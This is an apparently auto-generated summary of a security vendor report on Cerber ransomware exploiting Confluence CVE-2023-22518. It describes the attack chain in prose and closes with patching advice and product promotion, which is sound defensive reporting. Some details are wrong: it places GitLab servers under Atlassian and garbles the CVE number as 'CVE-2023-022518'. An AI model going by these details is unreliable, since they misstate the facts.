November 10, 2023 at 05:23AM
Cerber ransomware has been exploiting the Atlassian Confluence vulnerability CVE-2023-22518. The vulnerability allows unauthorized users to reset and create a Confluence instance administrator account, granting them full admin privileges. Cerber previously targeted Atlassian in 2021. The ransomware uses an encoded PowerShell command to download and execute a remote payload, encrypting files and appending the extension “.L0CK3D”. Atlassian users are advised to install patches and use additional protection measures to mitigate the risk.
Key Takeaways from Meeting Notes:
1. The Cerber ransomware has been exploiting the Atlassian Confluence vulnerability CVE-2023-22518.
2. Atlassian published an advisory on the vulnerability, stating that it allows unauthorized users to reset and create a Confluence instance administrator account, granting them admin privileges.
3. The proof-of-concept (PoC) for the CVE-2023-22518 vulnerability was leaked to the public on November 2, 2023.
4. The Cerber ransomware has previously targeted Atlassian, focusing on exploiting remote code execution vulnerabilities in Atlassian’s GitLab servers.
5. The Cerber ransomware uses an encoded PowerShell command to download and execute a remote payload.
6. The PowerShell script connects to a command-and-control (C&C) server and downloads a malicious text file.
7. The decoded text file contains the Cerber ransomware payload.
8. The Cerber ransomware encrypts files in the system and appends the extension “.L0CK3D” to them.
9. The ransomware drops a ransom note named “read-me3.txt” in all directories.
10. Apart from the Confluence vulnerability, Cerber is also deploying ransomware variants on Linux systems.
11. The new Cerber variant exploiting CVE-2023-022518 has similarities to previous versions but also has differences in the extension and ransom note format.
12. It is recommended that Confluence users promptly install patches to address the CVE-2023-22518 vulnerability. Temporary mitigation procedures are available if patching is not immediately possible.
13. Trend Vision One customers can utilize its attack surface risk management and Extended Detection and Response (XDR) capabilities to stay informed and protected.
14. Additional protection against CVE-2023-22518 exploits can be achieved through Trend Cloud One – Network Security & TippingPoint Protection Filters and Trend Cloud One – Workload Security & Deep Security IPS Rules.